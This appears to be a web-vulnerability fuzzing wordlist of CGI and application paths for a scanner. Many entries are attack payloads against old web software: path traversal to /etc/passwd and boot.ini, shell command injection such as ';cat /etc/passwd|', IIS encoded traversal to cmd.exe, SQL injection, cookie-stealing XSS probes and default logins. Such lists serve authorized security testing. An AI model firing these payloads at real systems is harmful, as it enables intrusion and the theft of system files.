# Fuzz inside CGI directories: each entry below is appended to the CGI directory path. On Windows this is usually /scripts, /bin, /cgi or /cgi-bin; on Unix, usually /cgi-bin, /cgi or /nph-cgi.
14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
14all.cgi?cfg=../../../../../../../../etc/passwd
666%0a%0a666.jsp
852566C90012664F
.aspx
.jsp
.shtm
.shtml
.stm
.thtml
?D=A
?M=A
?N=D
?Open
?OpenServer
?PageServices
?S=A
?\">
?mod=&op=browse
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
?pattern=/etc/*&sort=name
?sql_debug=1
?wp-cs-dump
ADMINconfig.php
ASP/cart/database/metacart.mdb
AT-admin.cgi
AT-generate.cgi
Admin/
Admin_files/
Admin_files/order.log
Administration/
Agent/
Agentes/
Agents/
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
AnyBoard.cgi
AnyForm
AnyForm2
Asp/
BACLIENT
Backup/add-passwd.cgi
C
CFIDE/administrator/index.cfm
CFIDE/probe.cfm
COM
CSMailto.cgi
CSMailto/CSMailto.cgi
CSNews.cgi
CVS/Entries
Cgitest.exe
Citrix/ICAWEB/
Citrix/MetaFrameXP/default/login.asp
Citrix/PNAgent/
Config1.htm
Count.cgi
DB4Web/10.10.10.10:100
DC
DCFORM
DCFORMS98.CGI
DCShop/auth_data/auth_user_file.txt
DCShop/orders/orders.txt
DEASAppDesign.nsf
DEASLog.nsf
DEASLog01.nsf
DEASLog02.nsf
DEASLog03.nsf
DEASLog04.nsf
DEASLog05.nsf
DEESAdmin.nsf
DMR/
Data/settings.xml+
DomainFiles/*//../../../../../../../../../../etc/passwd
EXE/
Excel/
File
FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek.cgi?head=&foot=;cat%20/etc/passwd
FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
FormMail.cgi?
modules/Search/index.php
modules/Submit/index.php?op=pre&title=
modules/WebChat/in.php+
modules/WebChat/out.php
modules/WebChat/quit.php
modules/WebChat/users.php
modules/Your_Account/navbar.php+
moin.cgi?test
mojo/mojo.cgi
moregroupware/modules/webmail2/inc/
movimientos/
mp3/
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
mqseries/
mrtg.cfg?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=../../../../../../../../etc/passwd
mrtg.cgi?cfg=blah
ms_proxy_auth_query/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found
msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
msadc/msadcs.dll
msadc/samples/adctest.asp
msadm/domain/index.php3?account_name=\">
msadm/site/index.php3?authid=\">
msadm/user/login.php3?account_name=\">
msdwda.nsf
mspress30/
msql/
msword/
mt-static/
mt-static/mt-check.cgi
mt-static/mt-load.cgi
mt-static/mt.cfg
mt/
mt/mt-check.cgi
mt/mt-load.cgi
mt/mt.cfg
mtatbls.nsf
mtdata/mtstore.nsf
mtstore.nsf
multihtml.pl?multi=/etc/passwd%00html
musicqueue.cgi
myguestBk/add1.asp?|-|0|404_Object_Not_Found
myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found
myguestBk/admin/index.asp?|-|0|404_Object_Not_Found
myguestbook.cgi?action=view
myhome.php?action=messages&box=
myinvoicer/config.inc
mylog.html?screen=/etc/passwd
mylog.phtml?screen=/etc/passwd
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
na_admin/
na_admin/ataglance.html
namazu.cgi
names.nsf
nav/cList.php?root=
netutils/findata.stm?user=
netutils/ipdata.stm?ipaddr=
netutils/whodata.stm?sitename=
new
new/
news
news/news.mdb
newsdesk.cgi?t=../../../../../../../../../../etc
newsdesk.cgi?t=../../../../../../../../../../etc/passwd
newtopic.php
newuser?Image=../../database/rbsserv.mdb
nikto.ida
nimages.php
nl/
nlog-smb.cgi
nlog-smb.pl
nntp/nd000000.nsf
nntp/nd000001.nsf
nntp/nd000002.nsf
nntp/nd000003.nsf
nntp/nd000004.nsf
nntppost.nsf
node/view/666\">
non-existent.pl
noshell
nosuchurl/>
notes.nsf
noticias/
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
nph-error.pl
nph-exploitscanget.cgi
nph-maillist.pl
nph-publish
nph-publish.cgi
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-test-cgi
nphp/nphpd.php
npn_admn.nsf
npn_rn.nsf
ns-icons/
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
nsn/env.bas
nsn/fdir.bas
nsn/fdir.bas:ShowVolume
ntitar.pl
ntsync4.nsf
ntsync45.nsf
nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
nul..cfm
nul..dbm
nul.cfm
nul.dbm
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
oc/Search/SQLQHit.asp
oc/Search/sqlqhit.asp
odbc/
oekaki/
oem_webstage/cgi-bin/oemapp_cgi
oem_webstage/oem.conf
officescan/cgi/cgiChkMasterPwd.exe
officescan/cgi/jdkRqNotify.exe
officescan/hotdownload/ofscan.ini
ojspdemos/basic/hellouser/hellouser.jsp
ojspdemos/basic/simple/usebean.jsp
ojspdemos/basic/simple/welcomeuser.jsp
old/
open?
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openautoclassifieds/friendmail.php?listing=
opendir.php?/etc/passwd
opendir.php?requesturl=/etc/passwd
oprocmgr-status
options.inc.php+
options.php?optpage=
oracle
oradata/
order/
order/order_log.dat
order/order_log_v12.dat
orders/
orders/checks.txt
orders/mountain.cfg
orders/order_log.dat
orders/order_log_v12.dat
orders/orders.log
orders/orders.txt
oscommerce/default.php
outgoing/
owa_util%2esignature
ows-bin/oaskill.exe?abcde.exe
ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah
ows-bin/perlidlc.bat?&dir
ows/
ows/restricted%2eshow
pafiledb/includes/team/file.php
page.cgi?../../../../../../../../../../etc/passwd
pagelog.cgi
pages/
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
pals-cgi?palsAction=restart&documentName=/etc/passwd
parse-file
parse_xml.cgi
pass
pass_done.php
passwd
passwd.adjunct
passwd.txt
passwdfile
password
password.inc
password/
passwords.txt
passwords/
path/nw/article.php?id='
pbcgi.cgi?name=Joe%Camel&email=%3C
pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll
pccsmysqladm/incs/dbconnect.inc
pdf/
people.list
perl
perl-status
perl.exe
perl.exe?-v
perl/
perl/-e%20%22system('cat%20/etc/passwd');\%22
perl/-e%20print%20Hello
perl/env.pl
perl/files.pl
perl/printenv
perl/samples/env.pl
perl/samples/lancgi.pl
perl/samples/ndslogin.pl
perl/samples/volscgi.pl
perl5/
perl5/files.pl
perl?-v
perlshop.cgi
perweb.nsf
pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
pfdispaly.cgi?../../../../../../../../../../etc
pfdispaly.cgi?../../../../../../../../../../etc/passwd
pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
phf
phf.cgi?QALIA
phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
phf?Qname=root%0Acat%20/etc/passwd%20
phorum/admin/footer.php?GLOBALS[message]=
phorum/admin/header.php?GLOBALS[message]=
phorum/admin/stats.php
photo/
photo/manage.cgi
photo/protected/manage.cgi
photo_album/apa_phpinclude.inc.php
photodata/
photodata/manage.cgi
php-cgi
php-coolfile/action.php?action=edit&file=config.php
php.cgi?/etc/passwd
php.ini
php/
php/gaestebuch/admin/index.php
php/index.php
php/mlog.html
php/mlog.phtml
php/mylog.html?screen=/etc/passwd
php/mylog.phtml?screen=/etc/passwd
php/php.exe?c:\boot.ini
php/php.exe?c:\winnt\boot.ini
php/php4ts.dll
phpBB/phpinfo.php
phpBB/viewtopic.php?t=17071&highlight=\">\"
phpBB/viewtopic.php?topic_id=
phpBB2/includes/db.php
phpBB2/search.php?search_id=1\
phpEventCalendar/file_upload.php
phpMyAdmin/
phpclassifieds/latestwap.php?url=
phpimageview.php?pic=javascript:alert('Vulnerable')
phpinfo.php
phpinfo.php3
phpinfo.php3?VARIABLE=
phpinfo.php?GLOBALS[test]=
phpinfo.php?VARIABLE=
phpinfo.php?cx[]=JUNK(4096)
phpmyadmin/
phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phprocketaddin/?page=../../../../../../../../../../boot.ini
phprocketaddin/?page=../../../../../../../../../../etc/passwd
phpshare/phpshare.php
phptonuke.php?filnavn=/etc/passwd
phptonuke.php?filnavn=
phpwebchat/register.php?register=yes&username=OverG&email=&email1=
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\">
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\">
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\">&MMN_position=[X:X]
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\">
pics/
piranha/secure/passwd.php3
pix/
pks/lookup
pls/admin
pls/dadname/htp.print?cbuf=
pls/help/
pls/ldc/admin_/
pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
pls/portal/HTP.PRINT
pls/portal/PORTAL.home
pls/portal/PORTAL.wwa_app_module.link
pls/portal/PORTAL.wwv_dynxml_generator.show
pls/portal/PORTAL.wwv_form.genpopuplist
pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
pls/portal/PORTAL.wwv_setting.render_css
pls/portal/PORTAL.wwv_ui_lovf.show
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
pls/portal/SELECT
pls/portal/null
pls/portal/owa_util.cellsprint?p_theQuery=select
pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
pls/portal/owa_util.listprint?p_theQuery=select
pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
pls/portal/owa_util.showsource?cname=owa_util
pls/portal/owa_util.signature
pls/portal30/admin_/
pls/sample/admin_/help/..%255cplsql.conf
pls/simpledad/admin_/
pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E
pls/simpledad/admin_/dadentries.htm
pls/simpledad/admin_/gateway.htm?schema=sample
pls/simpledad/admin_/globalsettings.htm
plusmail
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
pm/lib.inc.php
pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1
pmlite.php
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
poll
pollit/Poll_It_
pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
polls
pollssi.cgi
poppassd.php3+
porn/
post-query
post16.exe
post32.exe|dir%20c:\\
post_query
postcards.cgi
postinfo.html
postnuke/html/index.php?module=My_eGallery
postnuke/html/modules.php?op=modload&name=News&file=article&sid=
postnuke/index.php?module=My_eGallery
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
powerup/r.cgi?FILE=../../../../../../../../../../passwd
pp.php?action=login
ppdscgi.exe
pr0n/
prd.i/pgen/
printenv
printenv.tmp
privado/
private.nsf
private/
probecontrol.cgi?command=enable&username=cancer&password=killer
processit.pl
prod/
produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found
product_info.php
productcart/database/EIPC.mdb
productcart/pc/Custva.asp?|-|0|404_Object_Not_Found
profile.cgi
profile.php?u=JUNK(8)
profiles.php?uid=<script>alert(document.cookie)</script>
profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
project/index.php?m=projects&user_cookie=1
prometheus-all/index.php
pron/
proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\"
protected/
protected/secret.html+
protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''='
protection.php
proxy/ssllogin?user=administrator&password=administrator
proxy/ssllogin?user=administrator&password=operator
proxy/ssllogin?user=administrator&password=user
prueba/
pruebas/
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
pt_config.inc
ptg_upgrade_pkg.log
pu3.pl
pub/
pub/english.cgi?op=rmail
public.nsf
public/
publica/
publicar/
publico/
publisher/
publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
purchase/
purchases/
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20
pvote/ch_info.php?newpass=password&confirm=password%20
pvote/del.php?pollorder=1%20
pw/
pw/storemgr.pw
pwd.db
python/
qpadmin.nsf
query
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query?mss=%2e%2e/config
quickplace/quickplace/main.nsf
quickstart/qstart50.nsf
quickstart/wwsample.nsf
quickstore.cgi?page=../../../../../../../../../../etc
quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
quikmail/nph-emumail.cgi?type=../%00
quikstore.cfg
quikstore.cgi
quizme.cgi
r.cgi?FILE=../../../../../../../../../../etc
r.cgi?FILE=../../../../../../../../../../etc/passwd
ratlog.cgi
reademail.pl
readme
readme.eml
readme.nsf
readme.txt
readmec.nsf
readmes.nsf
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
redirect
register.cgi
register/
registered/
replicator/webpage.cgi/
replymsg.php?send=1&destin=
reports.nsf
reports/
reports/rwservlet
reports/rwservlet/getjobid4?server=myrep
reports/rwservlet/getjobid7?server=myrep
reports/rwservlet/showenv
reports/rwservlet/showjobs
reports/rwservlet/showmap
reports/rwservlet/showmap?server=myserver
reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
reports/temp/
reseller/
responder.cgi
restricted/
retail/
retrieve_password.pl
reviews/newpro.cgi
rguest.exe
rightfax/fuwww.dll/?
rksh
rmp_query
robadmin.cgi
robpoll.cgi
room/save_item.php
root
root/
rpc.php?q=">
rpc.php?q='&t='
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpm_query
rsh
rtm.log
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
rwcgi60
rwcgi60/showenv
rwwwshell.pl
sales/
sam
sam._
sam.bin
sample/
sample/faqw46
sample/framew46
sample/pagesw46
sample/siregw46
sample/site1w4646
sample/site2w4646
sample/site3w4646
samples/
samples/search.dll?query=
samples/search/queryhit.htm
save/
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
sawmill?rfcf+%22
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
sbcgi/sitebuilder.cgi
sca/menu.jsp
schema50.nsf
scoadminreg.cgi
scozbook/view.php?PG=whatever
scr/
scratch
screen.php
script>alert('Vulnerable').cfm
scripts
scripts/*%0a.pl
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
scripts/CGImail.exe
scripts/Carello/Carello.dll
scripts/admin.pl
scripts/cfgwiz.exe
scripts/contents.htm
scripts/convert.bas
scripts/counter.exe
scripts/cphost.dll
scripts/cpshost.dll
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
scripts/fpadmcgi.exe
scripts/fpadmin.htm
scripts/fpcount.exe
scripts/fpremadm.exe
scripts/fpsrvadm.exe
scripts/httpodbc.dll
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/no-such-file.pl
scripts/postinfo.asp
scripts/proxy/w3proxy.dll
scripts/repost.asp
scripts/root.exe?/c+dir+c:\+/OG
scripts/samples/ctguestb.idc
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/qfullhit.htw
scripts/samples/search/qsumrhit.htw
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
scripts/samples/search/webhits.exe
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
scripts/tools/ctss.idc
scripts/tools/dsnform
scripts/tools/dsnform.exe
scripts/tools/getdrvrs.exe
scripts/tools/newdsn.exe
scripts/tradecli.dll
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
scripts/weblog
scripts/wsisa.dll/WService=anything?WSMadmin
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
search.asp?Search=
search.asp?Search=\"><script>alert(Vulnerable)</script>
search.asp?term=<%00script>alert('Vulnerable')
search.cgi
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
search.php?mailbox=INBOX&what=x&where=&submit=Search
search.php?searchfor=\">
search.php?searchstring=
search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
search.php?zoom_query=
search.pl
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
search.pl?form=../../../../../../../../../../etc
search.pl?form=../../../../../../../../../../etc/passwd%00
search.vts
search/
search/?SectionIDOverride=1&SearchText=
search/SQLQHit.asp
search/htx/SQLQHit.asp
search/htx/sqlqhit.asp
search/inc/
search/index.cfm?
search/results.stm?query=<script>alert('vulnerable');</script>
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
search/sqlqhit.asp
search97.vts
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
secret.nsf
secret/
secure/
securecontrolpanel/
secured/
securelogin/1,2345,A,00.html
security/web_access.html
sell/
sendform.cgi
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
sendphoto.php
sendtemp.pl?templ=../../../../../../../../../../etc
sendtemp.pl?templ=../../../../../../../../../../etc/passwd
sensepost.exe?/c+dir
server-info
server-status
server/
server_stats/
servers/link.cgi
service/
services/
servicio/
servicios/
servlet/AdminServlet
servlet/ContentServer?pagename=
servlet/CookieExample?cookiename=
servlet/Counter
servlet/DateServlet
servlet/FingerServlet
servlet/HelloWorldServlet
servlet/IsItWorking
servlet/MsgPage?action=test&msg=
servlet/PrintServlet
servlet/SchedulerTransfer
servlet/SearchServlet
servlet/ServletManager
servlet/SessionManager
servlet/SessionServlet
servlet/SimpleServlet
servlet/SnoopServlet
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
servlet/allaire.jrun.ssi.SSIFilter
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
servlet/com.newatlanta.servletexec.JSP10Servlet/
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
servlet/com.unify.servletexec.UploadServlet
servlet/custMsg?guestName=
servlet/gwmonitor
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
servlet/org.apache.catalina.ContainerServlet/
servlet/org.apache.catalina.Context/
servlet/org.apache.catalina.Globals/
servlet/org.apache.catalina.servlets.WebdavStatus/
servlet/sq1cdsn
servlet/sqlcdsn
servlet/sunexamples.BBoardServlet
servlet/webacc
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
servlet/webacc?User.html=noexist
servlet/webpub
servlets/MsgPage?action=badlogin&msg=
servlets/SchedulerTransfer
servlets/weboam/oam/oamLogin
session/adminlogin
session/admnlogin
setpasswd.cgi
settings/site.ini
setup.exe?&page=list_users&user=P
setup.nsf
setup/
setupweb.nsf
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
sgdynamo.exe?HTNAME=
sh
shop.cgi?page=../../../../../../../etc/passwd
shop.pl/page=;cat%20shop.pl|
shop/
shop/auth_data/auth_user_file.txt
shop/database/metacart.mdb
shop/member_html.cgi?file=;cat%20/etc/passwd|
shop/member_html.cgi?file=|cat%20/etc/passwd|
shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>
shop/normal_html.cgi?file=../../../../../../etc/issue%00
shop/normal_html.cgi?file=;cat%20/etc/passwd|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
shop/orders/orders.txt
shop/php_files/site.config.php+
shop/search.php
shop/show.php
shopa_sessionlist.asp
shopadmin.asp
shopadmin.asp?Password=abc&UserName=">
shopdbtest.asp
shopexd.asp?catalogid='42
shoponline/fpdb/shop.mdb
shopper.cgi?newpage=../../../../../../../../../../etc
shopper.cgi?newpage=../../../../../../../../../../etc/passwd
shopper/
shopping/database/metacart.mdb
shopping/diag_dbtest.asp
shopping/shopdisplayproducts.asp?id=1&cat=
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
shoutbox.php?conf=../../../../../../../etc/passwd
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
show.pl
showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
showcheckins.cgi?person=
showcheckins.cgi?person=
showmail.pl
showmail.pl?Folder=
showuser.cgi
shtml.dll
signon
simple/view_page?mv_arg=|cat%20/etc/passwd|
simplebbs/users/users.php
simplestguest.cgi
simplestmail.cgi
sips/sipssys/users/a/admin/user
site/'
site/eg/source.asp
site/iissamples/
site_searcher.cgi
sitemap.xml
siteminder
siteminder/smadmin.html
siteseed/
siteserver/publishing/viewcode.asp?source=/default.asp
smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
smbcfg.nsf
smconf.nsf
smency.nsf
smg_Smxcfg30.exe?vcc=3560121183d3
smhelp.nsf
smmsg.nsf
smquar.nsf
smsolar.nsf
smssend.php
smtime.nsf
smtp.box
smtp.nsf
smtpibwq.nsf
smtpobwq.nsf
smtptbls.nsf
smvlog.nsf
soap/servlet/soaprouter
soapConfig.xml
soapdocs/ReleaseNotes.html
soapdocs/webapps/soap/
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
software.nsf
software/
soinfo.php?\">
sojourn.cgi?cat=../../../../../../../../../../etc
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
solaris/
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
source/
spelling.php3+
spin_client.cgi?aaaaaaaa
spwd
sql/
sqldump.sql
sqlnet.log
sqlqhit.asp
squirrelmail/src/read_body.php
src/
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
srchadm
srvinst.nsf
srvnam.htm
srvstatus.chl+
ss
ss.cfg
ss000007.pl?PRODREF=
sscd_suncourier.pl
ssdefs/siteseed.dtd
ssi/
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
staff/
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
start.php?config=alper.inc.php
stat.htm
stat.pl
stat/
staticpages/index.php
statistic/
statistics/
statmail.nsf
statrep.nsf
stats-bin-p/reports/index.html
stats.htm
stats.html
stats.pl
stats.prf
stats.txt
stats/
stats/statsbrowse.asp?filepath=c:\&Opt=3
stats_old/
statsconfig
status.php3
status/
status?full=true
statusconfig.pl
statview.pl
stauths.nsf
stautht.nsf
stconf.nsf
stconfig.nsf
stdnaset.nsf
stdomino.nsf
stlog.nsf
store.cgi?
